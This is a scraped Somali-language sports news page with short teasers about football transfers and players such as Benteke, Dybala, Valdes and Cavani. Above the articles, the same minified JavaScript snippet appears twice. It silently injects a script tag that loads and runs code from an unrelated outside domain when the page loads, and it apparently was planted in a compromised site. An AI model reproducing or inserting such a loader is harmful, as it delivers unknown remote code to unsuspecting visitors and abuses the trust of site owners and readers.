;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Wargeska Telegraph ayaa daabacay warbixin ay kasoo xigteen kooxda Liverpool kaasi oo ku aadan mustaqbalka weeraryahanka reer Belgium Christian Benteke. Macalin Jurgen Klopp ayaa madaxa Liverpool...
Xidiga kusoo baxay hogaamiyaha Juventus Paulo Dybala ayaa ka dhawaajiyay inuu aad u jecel yahay ka garab cayaarista Lionel Messi. Hadalka Paulo Dybala ayaa kusoo beegmayo...
nkasta oo ay wali ku jirto waqti kala guur ah, kooxda Chelsea ayaa doonaysa in difaaceeda dhexe ku soo xoojiso xidiga xulka qaranka Brazil iyo kooxda...
Goolhayihii ku fashilmay kooxda Man United ee Victor Valdes ayaa ugu danbeyn helay wado uu kaga baxsado ciqaabta uu ku hayay maclain Van Gaal wuxuuna si...
Wakiilka Jose Mourinho ayaa ku tulmaamay warqada la sheegay in tababarihii hore ee Chelsea uu u qoray Manchester United oo uu ku dalbanayo inuu noqdo tababaraah...
Chelsea ayaa ku warantay iney dooqa koowaad ka dhiganeyso Massimiliano Allegri si uu badal buuxa ugu noqdo Guus Hiddink oo haatan xilka kooxdaan si kumeel gaar...
Isagoo ka qeybgalayay xaflad ka dhaceysay gobolka Florida ee dalka mareykanka, xidigii hore ee Barcelona, Real Madrid, Inter Milan iyo xulka Brazil ee Ronaldo Luís Nazário...
Ciyaartoyda Manchester United ayaa lagu sawiray iyagoo imaanaya Lowry Hotel ka hor kulanka ay maanta Old Trafford ku soo dhaweynayaan kooxda Southampton maanta. Red Devils ayaa...
Kooxda Man United ee dalka ingiriiska ayaa si wayn ugu sii dhawaanaysa soo xero galinta weerar yahanka kooxda PSG ee Edinson Cavani. Cavani ayaa ku cadaadinaya...
Goolhayaha ku dhibtooday Man United ee Victor Valdes ayaa xaqiijiayay inuu ugu danbeyn helay albaab uu kaga abxsado ciqaabtii uu kala kulmay macalinka kooxdaasi Man United...